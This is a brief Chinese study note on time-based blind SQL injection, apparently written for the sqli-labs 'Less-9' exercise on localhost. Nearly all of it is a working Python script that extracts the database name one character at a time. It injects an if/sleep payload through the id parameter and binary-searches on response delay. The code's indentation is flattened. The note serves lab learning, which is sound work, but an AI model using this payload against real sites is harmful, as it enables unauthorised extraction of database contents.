时间盲注
不会抛出错误语句,怎们都是返回一样的
jb不知道什么问题python发包时用parse不行,要直接拼在url上
import requests,time
name = ''
for i in range(1,10):
low = 32
high = 128
mid = (low + high) // 2
while low < high:
# 爆出数据库名
url="http://127.0.0.1/Less-9/?id=1' and if(ascii(substr((select database()),{0},1))>{1},sleep(1),0)--+".format(i,mid)
start_time = time.time() # 注入前的系统时间
r = requests.get(url)
end_time = time.time() # 注入后的时间
if end_time - start_time > 1:
low = mid + 1
else:
high = mid
mid = (low + high) // 2
if mid <= 32 or mid >= 128:
break
name = name + chr(mid)
print (name)